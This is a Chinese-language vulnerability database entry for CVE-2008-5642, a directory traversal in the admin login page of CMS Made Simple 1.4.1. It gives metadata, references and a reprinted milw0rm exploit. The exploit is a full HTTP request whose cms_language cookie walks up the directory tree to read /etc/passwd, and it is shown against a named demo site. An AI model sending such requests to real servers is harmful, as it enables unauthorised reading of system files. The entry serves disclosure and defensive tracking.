CMS Made Simple 'cms_language' Cookie Parameter 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116864 漏洞类型 路径遍历
发布时间 2008-11-29 更新时间 2009-01-29
CVE编号 CVE-2008-5642 CNNVD-ID CNNVD-200812-334
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7285
https://cxsecurity.com/issue/WLB-2008120047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-334
|漏洞详情
CMSMadeSimple(简称CMSMS)是一款轻量级的内容管理系统,旨在为静态内容为主的小型门户网站提供最简单最轻松的架站体验。CMSMadeSimple1.4.1版本的admin/login.php中存在目录遍历漏洞。远程攻击者借助一个..,读取任意文件。
|漏洞EXP
Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)

Exploit:


Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]

GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache

It's possible to set "cms_language" value in order to view /etc/passwd file.

# milw0rm.com [2008-11-29]
|参考资料

来源:XF
名称:cmsmadesimple-login-file-include(46942)
链接:http://xforce.iss.net/xforce/xfdb/46942
来源:BID
名称:32535
链接:http://www.securityfocus.com/bid/32535
来源:MILW0RM
名称:7285
链接:http://www.milw0rm.com/exploits/7285
来源:VUPEN
名称:ADV-2008-3306
链接:http://www.frsirt.com/english/advisories/2008/3306
来源:SREASON
名称:4775
链接:http://securityreason.com/securityalert/4775
来源:SECUNIA
名称:32924
链接:http://secunia.com/advisories/32924